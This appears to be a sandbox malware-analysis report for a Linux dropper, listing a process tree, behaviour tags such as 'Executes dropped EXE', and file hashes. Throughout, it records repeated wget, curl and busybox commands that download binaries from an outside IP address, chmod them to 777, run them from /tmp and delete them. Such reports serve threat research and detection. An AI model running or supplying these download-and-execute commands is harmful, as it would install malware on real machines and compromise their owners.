/usr/bin/wgetwget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:973
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Reads runtime system information
- Writes file to tmp directory
PID:974
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:975
-
-
/bin/chmodchmod 777 fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- File and Directory Permissions Modification
PID:976
-
-
/tmp/fYaODLfEiC75T03xhqKvZrtXS76XgdDOV4./fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵
- Executes dropped EXE
PID:977
-
-
/bin/rmrm fYaODLfEiC75T03xhqKvZrtXS76XgdDOV42⤵PID:979
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:980
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:981
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:982
-
-
/bin/chmodchmod 777 cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- File and Directory Permissions Modification
PID:983
-
-
/tmp/cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy./cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵
- Executes dropped EXE
PID:984
-
-
/bin/rmrm cpyRMlWDb8JamkJfZpNEIZLpME9lg8HsAy2⤵PID:986
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:987
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Reads runtime system information
- Writes file to tmp directory
PID:988
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:989
-
-
/bin/chmodchmod 777 nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- File and Directory Permissions Modification
PID:990
-
-
/tmp/nHbisdjR87nM9vWnIHw7lGclq0KAPuM309./nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵
- Executes dropped EXE
PID:991
-
-
/bin/rmrm nHbisdjR87nM9vWnIHw7lGclq0KAPuM3092⤵PID:993
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:994
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:995
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:996
-
-
/bin/chmodchmod 777 J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- File and Directory Permissions Modification
PID:997
-
-
/tmp/J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs./J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵
- Executes dropped EXE
PID:998
-
-
/bin/rmrm J5DX2MqSXMkZG06BOcsxAQ9hAGwO6iOhgs2⤵PID:1000
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1001
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1002
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1003
-
-
/bin/chmodchmod 777 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- File and Directory Permissions Modification
PID:1004
-
-
/tmp/2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw1./2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵
- Executes dropped EXE
PID:1005
-
-
/bin/rmrm 2FZFgTgXOPwzIwpnF9kULKB5Vxsewvmlw12⤵PID:1007
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1008
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1009
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1010
-
-
/bin/chmodchmod 777 Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- File and Directory Permissions Modification
PID:1011
-
-
/tmp/Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp./Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵
- Executes dropped EXE
PID:1012
-
-
/bin/rmrm Ok6pmk0sm1IaqJUHX0J3fSOIZ6rvM4HQHp2⤵PID:1014
-
-
/usr/bin/wgetwget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1015
-
-
/usr/bin/curlcurl -O http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Reads runtime system information
- Writes file to tmp directory
PID:1016
-
-
/bin/busybox/bin/busybox wget http://87.120.125.191/bins/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1017
-
-
/bin/chmodchmod 777 shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- File and Directory Permissions Modification
PID:1018
-
-
/tmp/shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA./shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵
- Executes dropped EXE
PID:1019
-
-
/bin/rmrm shxV2xaIwH4vuPCuctvOJaDfixSmqRNmwA2⤵PID:1021
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
114B
MD5546071c6a6aeff34580b4d1a9b35a7c3
SHA1dc2de298837a86d3bc86e8a328411229d9eccdb6
SHA2562d1255033a3f5cde3fb430b15d84ad95c1d7d37b25132cd3dcca7c30963e9f12
SHA512207f333daf98fe653f4f661defd86651cbb50e3482511769d0558d2fd80ce107ec6a519424e05107740a802b444b62445901788d80dde4e8dbc8ee116d5b9be7